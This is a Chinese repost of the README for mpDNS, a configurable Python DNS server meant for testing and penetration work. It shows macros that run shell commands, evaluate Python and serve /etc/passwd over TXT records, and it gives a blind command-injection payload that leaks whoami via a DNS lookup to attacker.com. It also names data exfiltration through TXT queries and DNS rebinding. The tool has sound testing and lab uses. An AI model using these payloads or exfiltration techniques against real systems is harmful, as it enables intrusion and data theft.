内容简介:适用于Python 2和3names.db – >包含所有自定义记录(参见示例)
简单、可配置的“ clone和run ”DNS服务器,具有多种有用的功能。
适用于 Python 2和3
names.db – >包含所有自定义记录(参见示例)
简单的通配符,如* .example.com
捕获unicode dns请求
自定义动作又称宏:
- {{shellexec::dig google.com +short}}
– >执行 shell 命令并使用result响应
- {{eval::res = '1.1.1.%d' % random.randint(0,256)}}
- >评估你的python代码
- {{file::/etc/passwd}}
– >回复本地文件内容
- {{resolve}}
– >将DNS请求转发到本地系统DNS
- {{resolve::example.com}}
– >解析example.com而不是原始记录
- {{echo}}
– >回复对等地址
- {{shellexec::echo %PEER% %QUERY%}}
– >使用变量
支持的查询类型: A
, CNAME
, TXT
更新 names.db
记录而不重启/重新加载 ./mpdns.py -e
重度基于 https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
用法: ./mpdns.py
编辑 names.db
, ./mpdns.py -e
无需重启
进攻和防守目的:
1.您需要一个轻量级的简单DNS服务器解决方案用于测试目的(不生产!)
2.测试Web应用程序中的各种盲注漏洞(例如/ping.php?ip=$(dig $(whoami).attacker.com))
3.在一个 TXT
查询中轻松渗透65K数据
4.DNS重新绑定
5.对特定查询执行自定义宏操作(在恶意软件分析实验室环境中很有用)
6.还有更多。它是高度可定制的。
安装
git clone https://github.com/nopernik/mpDNS
限制
1.由于UDP数据报限制为65535字节,DNS响应限制在约65200字节, 此限制适用于 TXT
分成256字节块的记录,直到响应达到最大允许值65200b, 因此 TXT
宏记录 {{file:localfile.txt}}
限制为65200字节。
2.不支持嵌套通配符 test.*.example.com
3. {{resolve::example.com}}
宏中不支持自定义DNS服务器解析程序
4. TTL
始终设为 0
例子
names.db示例:
# Empty configuration will result in empty but valid responses # # Unicode domain names are not supported but still can be catched by the server. # for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored shellexec TXT {{shellexec::whoami}} eval TXT {{eval::import random; res = random.randint(1,500)}} resolve1 A {{resolve}} resolve2 A {{resolve::self}} #same as previous resolve3 A {{resolve::example.com}} blabla.com A 5.5.5.5 * A 127.0.0.1 *.example.com A 7.7.7.7 c1.example.com CNAME c2.example.com c2.example.com CNAME c3.example.com c3.example.com CNAME google.example.com google.example.com CNAME google.com test.example.com A 8.8.8.8 google.com A {{resolve::self}} notgoogle.com A {{resolve::google.com}}
使用names.db示例输出示例:
DB的定期解决方案: dig test.example.com @localhost
;; ANSWER SECTION: test.example.com. 0 IN A 8.8.8.8
mpDNS输出: - Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)
递归CNAME解析: dig c1.example.com @localhost
;; QUESTION SECTION: ;c1.example.com. IN A ;; ANSWER SECTION: c1.example.com. 0 IN CNAME c2.example.com. c2.example.com. 0 IN CNAME c3.example.com. c3.example.com. 0 IN CNAME google.example.com. google.example.com. 0 IN CNAME google.com. google.com. 0 IN A 216.58.206.14
mpDNS输出:
- Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME) - Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME) - Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME) - Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME) - Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)
通配符解析: dig not-in-db.com @localhost
;; ANSWER SECTION: not-in-db.com. 0 IN A 127.0.0.1
mpDNS输出: - Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)
通配符子域解析: dig wildcard.example.com @localhost
;; ANSWER SECTION: wildcard.example.com. 0 IN A 7.7.7.7
mpDNS输出: - Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)
转发请求宏: dig google.com @localhost
;; ANSWER SECTION: google.com. 0 IN A 172.217.22.110
mpDNS输出: - Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)
自定义域宏的转发请求: dig notgoogle.com @localhost
;; ANSWER SECTION: notgoogle.com. 0 IN A 172.217.22.110
mpDNS输出: - Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)
通过TXT查询文件内容宏: dig txt passwd.example.com @localhost
;; ANSWER SECTION: passwd.example.com. 0 IN TXT "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"
mpDNS输出: - Request from 127.0.0.1:38805 -> passwd.example.com. -> ['root:x:0:0:root...(2808)'] (TXT)
通过TXT查询自定义python代码宏: dig txt eval @localhost
;; ANSWER SECTION: eval. 0 IN TXT "320"
mpDNS输出: - Request from 127.0.0.1:33821 -> eval. -> ['320'] (TXT)
Shell命令宏通过TXT查询: dig txt shellexec @localhost
;; ANSWER SECTION: shellexec. 0 IN TXT "root"
mpDNS输出: - Request from 127.0.0.1:50262 -> shellexec. -> ['root'] (TXT)
*参考来源 github ,由周大涛编译,转载请注明来自FreeBuf.COM。
以上所述就是小编给大家介绍的《mpDNS:Python实现的多功能DNS服务器》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 多功能 Python IDE,NovalIDE 1.1.3 许多新功能发布
- 多功能 Python IDE,NovalIDE 1.1.3 许多新功能发布
- Qt的聊天型多功能文本编辑器
- k8s中如何配置多功能终端
- FinalRecon:一款多功能网络侦查OSINT工具
- ImageMagick 7.0.10-2 发布,多功能图片处理软件
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Linux命令行与shell脚本编程大全 第3版
[美]布鲁姆,布雷斯纳汉 / 门佳、武海峰 / 人民邮电出版社 / 2016-8-1 / CNY 109.00
这是一本关于Linux命令行与shell脚本编程的全方位教程,主要包括四大部分:Linux命令行,shell脚本编程基础,高级shell脚本编程,如何创建实用的shell脚本。本书针对Linux系统的最新特性进行了全面更新,不仅涵盖了详尽的动手教程和现实世界中的实用信息,还提供了与所学内容相关的参考信息和背景资料。通过本书的学习,你将轻松写出自己的shell脚本。一起来看看 《Linux命令行与shell脚本编程大全 第3版》 这本书的介绍吧!